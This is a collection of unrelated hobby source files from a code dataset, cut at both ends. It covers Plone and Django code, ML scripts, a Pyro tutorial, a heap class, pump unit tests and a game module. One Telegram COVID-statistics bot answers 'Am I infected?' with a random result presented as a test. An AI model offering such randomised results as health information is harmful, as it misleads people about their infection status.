state_change(obj, evt):\n \"\"\" state change \"\"\"\n\n subscribers = obj.aq_parent\n meeting = subscribers.get_meeting()\n subscribers_state = api.content.get_state(subscribers)\n if hasattr(evt, 'action'):\n if (evt.action == ACTION_APPROVE and subscribers_state != 'full' and\n subscribers.approved_count() >= meeting.max_participants):\n 
api.content.transition(obj=subscribers, transition='to_full')\n elif (evt.action == ACTION_REJECT and subscribers_state == 'full' and\n subscribers.approved_count() < meeting.max_participants):\n api.content.transition(obj=subscribers, transition='to_open')\n\n\ndef on_add(obj, evt):\n \"\"\" on add \"\"\"\n\n obj.uid = uuid.uuid4()\n meeting = obj.aq_parent.aq_parent\n if meeting.auto_approve:\n api.content.transition(obj=obj, transition='approve')\n\n\ndef on_delete(obj, evt):\n \"\"\" on delete \"\"\"\n subscribers = obj.aq_parent\n meeting = subscribers.get_meeting()\n subscribers_state = api.content.get_state(subscribers)\n if (subscribers_state == 'full' and meeting.allow_register and\n subscribers.approved_count() < meeting.max_participants):\n api.content.transition(obj=subscribers, transition='to_open')\n","repo_name":"eea/eea.meeting","sub_path":"src/eea/meeting/content/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19251695465","text":"import logging\nfrom behave.api.async_step import use_or_create_async_context, AsyncContext\n\ndef before_all(context):\n if not context.config.log_capture:\n logging.basicConfig(level=logging.DEBUG)\n\ndef before_scenario(context, scenario):\n context.async_loop = use_or_create_async_context(context, \"async_context1\").loop\n context.port_seq = 5000\n context.node = {}\n context.block_new = {}\n","repo_name":"mrkovec/coinpy","sub_path":"features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40168670188","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . 
import views\nurlpatterns = [\n path('',views.shop,name=\"shop\"),\n path('about/',views.about,name=\"about\"),\n path('details/',views.details,name=\"details\"),\n path('login/details',views.details,name=\"details\"),\n path('entry/',views.entry,name=\"entry\"),\n path('entry/about/',views.about,name=\"about\"),\n path('shop/details/',views.details,name=\"details\"),\n path('shop/buy/',views.buy,name=\"buy\"),\n path('server/',views.server,name=\"server\"),\n path('server/control/',views.control,name=\"control\"),\n path('server/control/delete',views.delete,name=\"delete\"),\n path('shop/buy/order/',views.order,name=\"order\"),\n path('server/control/save_in_db',views.save,name=\"save_in_db\"),\n path('login/',views.login,name=\"login\"),\n path('login/val',views.val,name=\"val\"),\n path('shop/search',views.search,name=\"search\"),\n path('shop/logout',views.logout,name=\"logout\"),\n path('server/control/admin/',admin.site.urls),\n path('shop/catagory_1/',views.catogories_1,name=\"catogories_1\"),\n path('shop/catagory_2/',views.catogories_2,name=\"catogories_2\"),\n path('shop/catagory_3/',views.catogories_3,name=\"catogories_3\"),\n path('shop/catagory_4/',views.catogories_4,name=\"catogories_4\"),\n path('shop/catagory_5/',views.catogories_5,name=\"catogories_5\"),\n path('shop/catagory_6/',views.catogories_6,name=\"catogories_6\"), \n]","repo_name":"abhijith-dev/AppleCart","sub_path":"AppleCart/client/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35156366197","text":"\"\"\"\n@author: enrico\n\n\"\"\"\nfrom model import Model\nimport numpy as np\nimport shutil\n\nmodel = Model(model_path='tf_models', ui_model=False)\n\nshutil.rmtree('confusion_matrices', ignore_errors=True)\n\nEPOCHS = 15\nN_SPLITS = 5\n\n# evaluate multilabel model\nmultilabel_results = model.evaluate_model(\n model.features, model.df_multilabel_labels, 'multilabel', epochs=EPOCHS, n_splits=N_SPLITS)\n# summarize performance\nprint('Multilabel model accuracy: %.3f (%.3f)' %\n (np.mean(multilabel_results), np.std(multilabel_results)))\n\n# evaluate multiclass model\nfor i in range(len(model.categories)):\n multiclass_results = model.evaluate_model(\n features=model.features, labels=model.df_multiclass_labels[:, i],\n task='multiclass', epochs=EPOCHS, n_splits=N_SPLITS, cat=i)\n # summarize performance\n print('Multiclass model accuracy - ' + str(model.categories[i]) + ': %.3f (%.3f)' %\n (np.mean(multiclass_results), np.std(multiclass_results)))\n","repo_name":"andrienr/Hotel-Reviews-Classification","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24417778777","text":"import numpy as np\nfrom sklearn.svm import LinearSVR as SVR\nfrom gen import get_eigenvalues\nfrom sklearn.externals import joblib\nimport time, sys\n\n# load the pre trained linear SVR\n# print('load model')\nsvr = joblib.load('1494690169.1373851model.pkl') \n\n# npzfile = np.load('large_data.npz')\n# X = npzfile['X']\n# y = npzfile['y']\n\n# # we already normalize these values in gen.py\n# # X /= X.max(axis=0, keepdims=True)\n\n# svr = SVR(C=10)\n# svr.fit(X, y)\n\ntest_file = sys.argv[1]\nans_file = sys.argv[2]\n\ntestdata = np.load(test_file)\ntest_X = []\nfor i in range(200):\n data = testdata[str(i)]\n vs = get_eigenvalues(data)\n test_X.append(vs)\n\ntest_X = 
np.array(test_X)\npred_y = svr.predict(test_X)\n\n# print('write predict')\nwith open(ans_file, 'w') as f:\n print('SetId,LogDim', file=f)\n for i, d in enumerate(pred_y):\n x = d\n if(np.abs((np.round(d) - d)) <= 0.2):\n x = np.round(d)\n x = np.log(x) \n print(f'{i},{x}', file=f)","repo_name":"alvinbhou/ML2017","sub_path":"hw4/dim.py","file_name":"dim.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4253439583","text":"import telebot\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom random import randint\r\n\r\n\r\ntoken = ''\r\nbot = telebot.TeleBot(token)\r\nurl_rf = 'https://index.minfin.com.ua/reference/coronavirus/geography/russia/'\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef first_message(message):\r\n \"\"\"Greeting and keyboard output.\"\"\"\r\n keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n keyboard.row('Статистика по миру', 'Статистика по России')\r\n keyboard.row('Заражён ли я?')\r\n bot.send_message(message.chat.id, 'Привет, что хочешь узнать?',\r\n reply_markup=keyboard)\r\n\r\n\r\n@bot.message_handler(regexp='Статистика по России')\r\ndef stats_rf(message):\r\n \"\"\" It displays statistics on coronavirus from the website of\r\n the Ministry of Finance, but for Russia.\r\n \"\"\"\r\n requ_rf = requests.get(url_rf)\r\n soup = BeautifulSoup(requ_rf.content, 'html.parser')\r\n stats_all = soup.find('strong', class_='black').text\r\n stats_dead = soup.find('strong', class_='red').text\r\n stats_healthy = soup.find('strong', class_='green').text\r\n bot.send_message(message.chat.id, '🇷🇺😷Всего заболевших - ' + stats_all)\r\n bot.send_message(message.chat.id, '🇷🇺💀Смертельные случаи - ' + stats_dead)\r\n bot.send_message(message.chat.id, '🇷🇺✨Выздоро­вевшие - ' + stats_healthy)\r\n\r\n\r\n@bot.message_handler(regexp='Статистика по миру')\r\ndef stats_global(message):\r\n \"\"\" Displays statistics on coronavirus from the website of\r\n the Ministry of Finance.\r\n \"\"\"\r\n requ_gl = requests.get('https://index.minfin.com.ua/reference/coronavirus')\r\n soup = BeautifulSoup(requ_gl.content, 'html.parser')\r\n stats_all = soup.find('strong', class_='black').text\r\n stats_dead = soup.find('strong', class_='red').text\r\n stats_healthy = soup.find('strong', class_='green').text\r\n bot.send_message(message.chat.id, '😷Всего заболевших - ' + stats_all)\r\n bot.send_message(message.chat.id, '💀Смертельные случаи - ' + stats_dead)\r\n bot.send_message(message.chat.id, '✨Выздоро­вевшие - ' + stats_healthy)\r\n\r\n\r\n@bot.message_handler(regexp='Заражён ли я?')\r\ndef corona_test(message):\r\n \"\"\"With a 50 to 50 chance, it shows your result on coronavirus.\"\"\"\r\n markup = telebot.types.InlineKeyboardMarkup()\r\n markup.add(telebot.types.InlineKeyboardButton(text='Проверить ещё раз',\r\n callback_data='yes'))\r\n rand = randint(0, 11)\r\n if rand >= 5:\r\n bot.send_photo(message.chat.id, 'https://clck.ru/MkPER',\r\n reply_markup=markup)\r\n else:\r\n bot.send_message(message.chat.id, 'Сейчас - нет🦠',\r\n reply_markup=markup)\r\n\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef query_handler(call):\r\n \"\"\"Re-conducting a coronavirus test.\"\"\"\r\n if call.data == 'yes':\r\n bot.delete_message(call.message.chat.id, call.message.message_id)\r\n # Removes previous coronavirus result.\r\n markup = telebot.types.InlineKeyboardMarkup()\r\n markup.add(telebot.types.InlineKeyboardButton(text='Проверить ещё раз',\r\n 
callback_data='yes'))\r\n rand = randint(0, 11)\r\n if rand >= 5:\r\n bot.send_photo(call.message.chat.id, 'https://clck.ru/MkPER',\r\n reply_markup=markup)\r\n else:\r\n bot.send_message(call.message.chat.id, 'Сейчас - нет🦠',\r\n reply_markup=markup)\r\n\r\n\r\n@bot.message_handler(commands=['info'])\r\ndef what(message):\r\n \"\"\"Information about the bot.\"\"\"\r\n bot.send_message(message.chat.id, '🤑My bitcoin wallet🤑\\\r\n 1FLApcQPyJVmf3uevcN2JiXWpWD86xEVod')\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef wrong_command(message):\r\n \"\"\"Unknown message.\"\"\"\r\n bot.send_message(message.chat.id, '???????????????????')\r\n\r\n\r\nif __name__ == '__main__':\r\n bot.infinity_polling()\r\n","repo_name":"sekaskateboards/covid_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1539057485","text":"def numtopattern(index,k):\n\tif k == 1:\n\t\tprint (numbsym(index))\n\t\treturn numbsym(index)\n\tprefixindex = index//4\n\tprint(prefixindex)\n\tr = index%4\n\tprint(r)\n\tsymbol = numbsym(r)\n\t#print(symbol)\n\tprefixpattern = numtopattern(prefixindex, k-1)\n\tprint(prefixpattern+symbol)\n\treturn prefixpattern + symbol\n\ndef numbsym(index):\n\tnum = {0:\"A\", 1:\"C\", 2:\"G\", 3:\"T\"}\n\t#print(num[index])\n\treturn num[index]\n\nimport sys # you must import \"sys\" to read from STDIN\nindex, k = sys.stdin.read().splitlines()\nprint(index)\nprint(k)\nwith open(\"result.txt\", 'a') as out:\n\tout.write(str(numtopattern(int(index),int(k))))","repo_name":"tyang1/Bioinformatics_Algorithm","sub_path":"numtop.py","file_name":"numtop.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28234924234","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.5.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# # SVI Part I\n#\n# http://pyro.ai/examples/svi_part_i.html\n\n# ## Setup\n\n# The different pieces of model() are encoded via the mapping:\n#\n# * observations: `pyro.sample` with the `obs` argument\n# * latent random variables: `pyro.sample`\n# * parameters: `pyro.param`\n#\n# Note that the `obs` is used for conditioning, either you call `pyro.condition()` with on the model and use the `data` parameter to pass a dictionary of `{'sample name': observation}`, or you can call `obs=value` directly inside `pyro.sample`. \n#\n# As a gotcha: In Pyro they use \"latent variables\" ($\\mathbf{z}$) to mean unobservable `pyro.sample` calls, not the latent variables from BNN+LV.\n\n# ## Model learning\n\n# Note that the last equation shown is just Bayes theorem.\n\n# ## Guide\n\n# Want to know the posterior distribution $p(\\mathbf{z}|\\mathbf{x})$ but it's intractable.\n# Instead approximate it with the **guide** $q_{\\phi}(\\mathbf{z})$, where $\\phi$ are the variational parameters.\n#\n# The guide does not contain observations as it must be a properly normalised distribution.\n#\n# For every latent variable (`pyro.sample` statement without an observation) in the `model()`, there must be a matching `pyro.sample` in the `guide()` with the same name (e.g. 
`pyro.sample('z_1')`).\n# The actual distributions called in each can be different, just the names must match.\n\n# ## Evidence Lower Bound (ELBO)\n\n# Need to revisit this and check how ELBO gets to KL divergence.\n\n# ## `SVI` class\n\n# `SVI` does variational inference in Pyro.\n# Currently only supports ELBO loss, in future more will be added.\n#\n# The user needs to provide three things: the model, the guide, and an optimizer.\n# As an example:\n# ```python\n# import pyro\n# from pyro.infer import SVI, Trace_ELBO\n# svi = SVI(model, guide, optimizer, loss=Trace_ELBO())\n# ```\n\n# ## Optimizers\n\n# Pyro provides its own optimizers you have to use.\n# These are just wrappers around PyTorch optimizers.\n# The difference is that Pyro will generate a new optimizer for every parameter in the model (every `pyro.param`).\n# This is because the `model()` and the `guide()` parameters can be created dynamically during learning (since they are named within the functions, the names can be dynamic so long as they match between the model and the guide).\n#\n# For most cases we don't care much and just call something like:\n# ```python\n# from pyro.optim import Adam\n#\n# adam_params = {\"lr\": 0.005, \"betas\": (0.95, 0.999)}\n# optimizer = Adam(adam_params)\n# ```\n# which will apply the Adam optimizer with identical settings to all parameters.\n#\n# Otherwise you can pass a callable to the optimizer with the arguments `module_name` and `param_name`, e.g.:\n# ```python\n# from pyro.optim import Adam\n#\n# def per_param_callable(module_name, param_name):\n#     if param_name == 'my_special_parameter':\n#         return {\"lr\": 0.010}\n#     else:\n#         return {\"lr\": 0.001}\n#\n# optimizer = Adam(per_param_callable)\n# ```\n\n# ## A simple example\n\nimport math\nimport os\nimport torch\nimport torch.distributions.constraints as constraints\nimport pyro\nfrom pyro.optim import Adam\nfrom pyro.infer import SVI, Trace_ELBO\nimport pyro.distributions as dist\n\n# this is for running the notebook in our testing framework\nsmoke_test = ('CI' in os.environ)\nn_steps = 2 if smoke_test else 2000\n\n# enable validation (e.g. 
validate parameters of distributions)\n# We have a newer version\n# assert pyro.__version__.startswith('1.3.0')\npyro.enable_validation(True)\n\n# clear the param store in case we're in a REPL\npyro.clear_param_store()\n\n# create some data with 6 observed heads and 4 observed tails\ndata = []\nfor _ in range(6):\n    data.append(torch.tensor(1.0))\nfor _ in range(4):\n    data.append(torch.tensor(0.0))\n\n\ndef model(data):\n    # define the hyperparameters that control the beta prior\n    alpha0 = torch.tensor(10.0)\n    beta0 = torch.tensor(10.0)\n    # sample f from the beta prior\n    f = pyro.sample(\"latent_fairness\", dist.Beta(alpha0, beta0))\n    # loop over the observed data\n    for i in range(len(data)):\n        # observe datapoint i using the bernoulli likelihood\n        pyro.sample(\"obs_{}\".format(i), dist.Bernoulli(f), obs=data[i])\n\n\ndef guide(data):\n    # register the two variational parameters with Pyro\n    # - both parameters will have initial value 15.0.\n    # - because we invoke constraints.positive, the optimizer\n    # will take gradients on the unconstrained parameters\n    # (which are related to the constrained parameters by a log)\n    alpha_q = pyro.param(\"alpha_q\", torch.tensor(15.0),\n                         constraint=constraints.positive)\n    beta_q = pyro.param(\"beta_q\", torch.tensor(15.0),\n                        constraint=constraints.positive)\n    # sample latent_fairness from the distribution Beta(alpha_q, beta_q)\n    pyro.sample(\"latent_fairness\", dist.Beta(alpha_q, beta_q))\n\n\n# setup the optimizer\nadam_params = {\"lr\": 0.001, \"betas\": (0.90, 0.999)}\noptimizer = Adam(adam_params)\n\n# setup the inference algorithm\nsvi = SVI(model, guide, optimizer, loss=Trace_ELBO())\n\n# do gradient steps\nfor step in range(n_steps):\n    svi.step(data)\n    if step % 100 == 0:\n        print('.', end='')\n\n# grab the learned variational parameters\nalpha_q = pyro.param(\"alpha_q\").item()\nbeta_q = pyro.param(\"beta_q\").item()\n\nalpha_q, beta_q\n\n# here we use some facts about the beta distribution\n# compute the inferred mean of the coin's fairness\ninferred_mean = alpha_q / (alpha_q + beta_q)\n# compute inferred standard deviation\nfactor = beta_q / (alpha_q * (1.0 + alpha_q + beta_q))\ninferred_std = inferred_mean * math.sqrt(factor)\n\nprint(\"\\nbased on the data and our prior belief, the fairness \" +\n      \"of the coin is %.3f +- %.3f\" % (inferred_mean, inferred_std))\n","repo_name":"kahn-jms/bayesian-network","sub_path":"pyro_tutorial_svi_part_i.py","file_name":"pyro_tutorial_svi_part_i.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12753288199","text":"__author__ = 'HaoBin'\n\nclass Node():\n    def __init__(self, data, left=None, right=None):\n        self.node = data\n        self.left = left\n        self.right = right\n\nclass NodeHeap():\n    def __init__(self,root):\n        self.root = Node(root)\n\n#####################################\n\nclass Heap():\n    def __init__(self):\n        self.array = []\n        self.count = 0\n\n    def __len__(self):\n        return self.count\n\n    def empty(self):\n        return self.count == 0\n\n    def peek(self):\n        if self.empty() is False:\n            return self.array[0]\n        else:\n            return None\n\n    def pop(self):\n        if self.empty() is False:\n            item = self.array[0]\n            self.array[0] = self.array[self.count-1]\n            self.array.pop()  # drop the now-duplicated last slot before re-heapifying\n            self.count -= 1\n            self.downHeap(0)\n            return item\n        else:\n            return None\n\n    def insert(self, key):\n        self.array.append(key)\n        self.count += 1\n        k = self.count-1\n        self.upHeap(k)\n\n    def parent(self,i):\n        if i == 0:\n            return 0\n        elif i % 2 == 0:\n            return (i-2) // 2\n        elif i % 2 
== 1:\n return (i-1) // 2\n\n\n def upHeap(self,i):\n parent = self.parent(i)\n while self.array[parent] < self.array[i] and i > 0:\n self.array[i], self.array[parent] = self.array[parent], self.array[i]\n i = parent\n parent = self.parent(i)\n\n def downHeap(self,i):\n child= (2*i) + 1\n n = len(self)-1\n while child <= n:\n if child < n:\n if self.array[child] < self.array[child+1]:\n child += 1\n if self.array[i] < self.array[child]:\n self.array[i], self.array[child] = self.array[child], self.array[i]\n i = child\n child = (2*i) + 1\n else:\n break\n\n\n\n\nif __name__ == \"__main__\":\n x = Heap()\n x.insert(0)\n x.insert(1)\n print(x.array)\n\n x.insert(2)\n x.insert(3)\n x.insert(4)\n x.insert(5)\n x.insert(6)\n x.insert(7)\n # print(x.array)\n print(x.pop())\n #\n print(len(x))\n #x.insert(8)\n print(x.array)","repo_name":"hbinl/hbinl-scripts","sub_path":"Python/P5 - Sorting and Edit Distance/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23592780318","text":"\"\"\"\nUnit tests for the water-regulation module\n\"\"\"\n\nimport sys\nimport unittest\nfrom unittest.mock import MagicMock\nfrom pump import Pump\nfrom sensor import Sensor\nfrom .controller import Controller\nfrom .decider import Decider\nsys.path.append('../pump')\nsys.path.append('../sensor')\n\n\nclass DeciderTests(unittest.TestCase):\n \"\"\"\n Unit tests for the Decider class\n \"\"\"\n\n def test_off_too_high(self):\n \"\"\"\n scenario: PUMP_OFF, above target water level margin\n :return: PUMP_OUT\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(110, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_OUT\"], result)\n\n def test_off_too_low(self):\n \"\"\"\n scenario: PUMP_OFF, below target water level margin\n :return: PUMP_IN\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(90, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_IN\"], result)\n\n def test_off_just_right(self):\n \"\"\"\n scenario: PUMP_OFF, at target water level\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(100, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n def test_in_too_high(self):\n \"\"\"\n scenario: PUMP_IN, above target water level\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(101, \"PUMP_IN\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n def test_in_not_enough(self):\n \"\"\"\n scenario: PUMP_IN, below target water level\n :return: PUMP_IN\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': 
pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(96, \"PUMP_IN\", actions)\n self.assertEqual(actions[\"PUMP_IN\"], result)\n\n def test_out_too_much(self):\n \"\"\"\n scenario: PUMP_OUT, above target water level\n :return: PUMP_OUT\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(101, \"PUMP_OUT\", actions)\n self.assertEqual(actions[\"PUMP_OUT\"], result)\n\n def test_out_not_enough(self):\n \"\"\"\n scenario: PUMP_OUT, below target water level.\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(99, \"PUMP_OUT\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n\nclass ControllerTests(unittest.TestCase):\n \"\"\"\n Unit tests for the Controller class\n \"\"\"\n\n def test_controller(self):\n \"\"\"\n Tests controller without invoking decider directly.\n \"\"\"\n pump = Pump('127.0.0.1', \"8001\")\n pump.get_state = MagicMock(return_value=1)\n pump.set_state = MagicMock(return_value=True)\n sensor = Sensor('127.0.0.1', \"8081\")\n sensor.measure = MagicMock(return_value=120)\n decider = Decider(100, 0.05)\n decider.decide = MagicMock(return_value=1)\n controller = Controller(sensor, pump, decider)\n controller_called = controller.tick()\n sensor.measure.assert_called()\n pump.get_state.assert_called()\n decider.decide.assert_called_with(120, 1, {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n })\n self.assertEqual(controller_called, True)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Chay_Casso/Lesson06/water-regulation-master/waterregulation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29929325554","text":"prefCliente =int(input('Ola'\n '\\nSelecione o tipo de combustivel que voce deseja!'\n '\\nDigite o numero do combustivel.'\n '\\n(1)Gasolina Aditivada'\n '\\n(2)Gasolina Comum'\n '\\n(3)Diesel'\n '\\n(4)Etanol'\n '\\n'))\n\ndinheiroCliente =int(input ('Digite quanto de combustivel deseja colocar:'))\n\nif prefCliente == 1 :\n combus1 = dinheiroCliente/6.90\n print (f'Total de combustivel:{combus1:.2f}L')\nelif prefCliente == 2 :\n combus2 = dinheiroCliente/7.27\n print(f'Total de combustivel:{combus2:.2f}L')\nelif prefCliente == 3 :\n combus3 = dinheiroCliente/6.88\n print(f'Total de combustivel: {combus3:.2f}L')\nelif prefCliente == 4 :\n combus4 = dinheiroCliente/4.99\n print(f'Total de combustivel:{combus4:.2f}L')\n\n\n ","repo_name":"darahgarcia/projetos-treino","sub_path":"cliente.posto.py","file_name":"cliente.posto.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28513984681","text":"import sys\nfrom time import sleep\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n '''respond to keydown'''\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n if event.key == pygame.K_LEFT:\n ship.moving_left = True\n if event.key 
== pygame.K_UP:\n ship.moving_up = True\n if event.key == pygame.K_DOWN:\n ship.moving_down = True\n elif event.key == pygame.K_SPACE:\n # create a bullet and add it into bullets Group\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n '''if haven not reached to the limit, fire a bullet'''\n if len(bullets) < ai_settings.bullets_allowed: # bullet num limit\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n '''respond to keyup'''\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n if event.key == pygame.K_LEFT:\n ship.moving_left = False\n if event.key == pygame.K_UP:\n ship.moving_up = False\n if event.key == pygame.K_DOWN:\n ship.moving_down = False\n\n\ndef check_events(ai_settings, screen, stats, sb, play_button, ship, aliens, bullets):\n \"\"\"check mouse and keyboard events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, sb, play_button, ship,\n aliens, bullets, mouse_x, mouse_y)\n\n\ndef check_play_button(ai_settings, screen, stats, sb, play_button, ship, aliens,\n bullets, mouse_x, mouse_y):\n '''start game when Play button is clicked'''\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n # reset game settings\n ai_settings.initialize_dynamic_settings()\n\n # reset game stats info\n pygame.mouse.set_visible(False)\n stats.reset_stats()\n stats.game_active = True\n\n # reset scoreboard image\n sb.prep_score()\n sb.prep_high_score()\n sb.prep_level()\n sb.prep_ships()\n\n # empty aliens and bullets\n aliens.empty()\n bullets.empty()\n\n # create a new group of aliens and center the ship\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n\n\ndef update_screen(ai_settings, screen, stats, sb, ship, aliens, bullets, play_button):\n '''update images on display and switch to new screen'''\n # redraw in every loop\n screen.fill(ai_settings.bg_color)\n # draw bullets after ship and aliens\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n # show score\n sb.show_score()\n\n # if the game is inactive, draw Play button\n if not stats.game_active:\n play_button.draw_button()\n\n # only the newest screen can be visible\n pygame.display.flip()\n\n\ndef update_bullets(ai_settings, screen, stats, sb, ship, aliens, bullets):\n '''update bullet position, and remove disapeared bullets'''\n # update bullet position\n bullets.update()\n\n # remove disapared bullet and print sprite number\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n\n # print(bullets) # for testing bullet delete function\n\n check_bullet_alien_collisions(\n ai_settings, screen, stats, sb, ship, aliens, bullets)\n\n\ndef check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship, aliens, bullets):\n '''respond to the collision of an alien and a bullet'''\n\n # remove collided alien and bullet\n collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\n\n if collisions:\n for aliens in collisions.values():\n stats.score += 
ai_settings.alien_points * len(aliens)\n            sb.prep_score()\n        check_high_score(stats, sb)\n\n    if len(aliens) == 0:\n        # remove all bullets and renew a group of aliens\n        bullets.empty()\n        ai_settings.increase_speed()\n\n        # increase level\n        stats.level += 1\n        sb.prep_level()\n\n        create_fleet(ai_settings, screen, ship, aliens)\n\n\ndef get_number_aliens_x(ai_settings, alien_width):\n    '''calculate how many aliens in a line'''\n    available_space_x = ai_settings.screen_width - 2 * alien_width\n    number_aliens_x = int(available_space_x / (2 * alien_width))\n    return number_aliens_x\n\n\ndef get_number_rows(ai_settings, ship_height, alien_height):\n    '''calculate how many lines of aliens'''\n    available_space_y = (ai_settings.screen_height -\n                         (3 * alien_height) - ship_height)\n    number_rows = int(available_space_y / (2 * alien_height))\n    return number_rows\n\n\ndef create_alien(ai_settings, screen, aliens, alien_number, row_number):\n    '''create an alien and position it in the current line'''\n    alien = Alien(ai_settings, screen)\n    alien_width = alien.rect.width\n    alien.x = alien_width + 2 * alien_width * alien_number\n    alien.rect.x = alien.x\n    alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n    aliens.add(alien)\n\n\ndef create_fleet(ai_settings, screen, ship, aliens):\n    ''' create an alien fleet'''\n    # create an alien and calculate how many in a line\n    alien = Alien(ai_settings, screen)\n    number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n    number_rows = get_number_rows(\n        